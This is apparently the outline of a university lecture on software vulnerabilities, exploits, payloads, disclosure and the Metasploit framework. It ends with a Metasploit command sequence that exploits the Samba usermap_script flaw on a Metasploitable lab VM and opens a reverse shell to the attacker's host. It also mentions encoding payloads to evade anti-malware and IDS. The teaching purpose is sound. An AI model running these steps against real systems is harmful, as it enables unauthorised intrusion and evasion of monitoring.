Software Vulnerabilities: Computer Security Lectures 2014/15 S2

This video is part of the computer/information/cyber security and ethical hacking lecture series; by Z. Cliffe Schreuders at Leeds Beckett University. Laboratory work sheets, slides, and other open educational resources are available at http://z.cliffe.schreuders.org.

The slides themselves are creative commons licensed CC-BY-SA, and images used are licensed as individually attributed.

Topics covered in this lecture include:

Programs behaving badly
Software vulnerabilities
Exploits
Exploitation
Payloads
A payload is the malicious code that is consequently run on the target system, if the exploit is successful
Common types of vulnerabilities / payloads
Information leaks
Denial of service (DoS)
Arbitrary code execution: the attacker can run code/commands
Specific database/shell commands
The execution of machine code
Bind shell
Reverse shell
Privilege Escalation
Vertical privilege escalation
Access to resources for higher privilege users or applications
Horizontal privilege escalation
Access to resources for other users or applications
Window of vulnerability
A zero day security vulnerability is a new security problem that has been discovered
Vulnerability disclosure
Responsible disclosure
Full disclosure
Vulnerability reward schemes..
Google Vulnerability Rewards Program
Reward schemes generally require 'responsible disclosure'
Facebook Responsible Disclosure Policy
Vulnerability reward schemes
Others such as TippingPoint, Secunia, and iDefense will pay for exploits against popular vendors
Bugcrowd
Project Zero
In 2014 Google started Project Zero
Auditing and permission
“Ethical hacking”, basically means you have legal permission to do a security audit
Updating:
Keeping software up-to-date so that you have all the vendor-supplied fixes
Patching
Could be source or binary changes
More mitigation...
Vulnerability analysis scanning
Checking against databases of known vulnerabilities (automated using tools such as Nessus or manually checking advisories)
Penetration testing...
Metasploit framework (MSF)
Developed by HD Moore
The framework is FOSS, with some proprietory interfaces, now owned by Rapid7
Highly modular: can easily combine different exploits and payloads
Much more flexible than the manual method of altering exploits programmed in C
Metasploit framework (MSF)
Includes an extensive library of modules
Exploits
Payloads
Encoding
Post-exploitation actions
MSF exploits
MSF contains over 1000 exploits, including:
OS flaws:
Windows, Linux, Mac, ...
Services:
Apache, IIS, …
Applications:
Adobe Reader, IE, Firefox, …
Web apps:
some new support
MSF payloads
MSF contains many payloads:
msfpayload -l | less
Most target specific platforms
bind or reverse shells, VNC, etc
MSF encode
MSF can encode exploits/payloads to avoid detection
Alternative instructions
Encrypt instructions, along with decrypt code
Similar to how polymorphic viruses avoid detection
Can also bind and convert payloads to executables
Lots of encoding methods:
msfencode -l
MSF interfaces
Msfcli: command line
Msfconsole: console (very powerful)
Metasploit Community / Pro: proprietory web interfaces and additional tools
Armitage: FOSS GUI
Steps of using MSF to exploit
Specify the exploit to use
Set options for the exploit (such as the IP address of the computer to attack)
Choose a payload (this defines what we end up doing on the compromised system)
Optionally choose encoding to evade security monitoring such as anti-malware, intrusion detection systems (IDS), and so on
Launch the exploit
Example (vs Metasploitable)
use exploit/multi/samba/usermap_script
show options
set RHOST {Metasploitable-IP-Address}
show payloads
set PAYLOAD cmd/unix/reverse
set LHOST {Your-Kali-IP-Address}
set LPORT {Your-Choice-of-Port}
check
exploit
Malware and vulnerabilities